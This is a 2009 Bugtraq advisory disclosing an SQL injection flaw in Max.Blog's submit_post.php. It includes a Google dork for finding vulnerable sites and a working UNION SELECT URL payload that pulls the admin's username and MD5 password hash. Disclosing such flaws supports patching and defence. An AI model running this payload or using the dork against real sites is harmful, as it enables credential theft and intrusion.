Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Tue, 27 Jan 2009 21:47:56 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=gy8HHH93WrT08Kfm8Vq8IngvvKo2t14MMILdX7Soe/Q=; b=fUOI8ZeCjpznuctZ+5+ZLdnSdKaP99UzqBw/tm42jQc5loanS9mz8ir4rXVC3N3yih NvqIqB7HQ9IU/jbATLoMql/evzkwcBobRRx7Xar2kv+15yqv7Nz7/CCUXqc23GVGTSj0 hC0SAyu6Jy3iuJ9tx4lnh/2KTdFml4/9eJBFU=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=JIf7Gbm5XrLCBri6G/IjfSmEL5DSfbUUMkPTSMA6eR7qm0l9pfgzAlFFebAofR8vEH o6F/4Hv/HQWNkAwk6ESqnD8awGs1vqQIXC6nfV3bYUx7/ZcH+z1h+xOVRk9p4x29STUf BOSJ+A7kDXkQjLPwzvxuKPQ38iLfAljSqlIPk=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

###################             Salvatore "drosophila" Fresta    
###################


Application:    Max.Blog
                                http://www.mzbservices.com
Version:                Max.Blog <= 1.0.6
Bug:            * SQL Injection
Exploitation:   Remote
Dork:                   intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                        e-mail: drosophilaxxx@xxxxxxxxx
                

############################################################################

- BUGS

SQL Injection:

        Requisites: magic quotes = off

        File affected: submit_post.php

        This bug allows a registered user to view username and password (md5) 
of a
        registered user with the specified id (usually 1 for the admin)

        
http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351

Prev by Date: [ MDVSA-2009:030 ] amarok
Next by Date: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
Previous by thread: [ MDVSA-2009:030 ] amarok
Next by thread: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
Index(es):
- Date
- Thread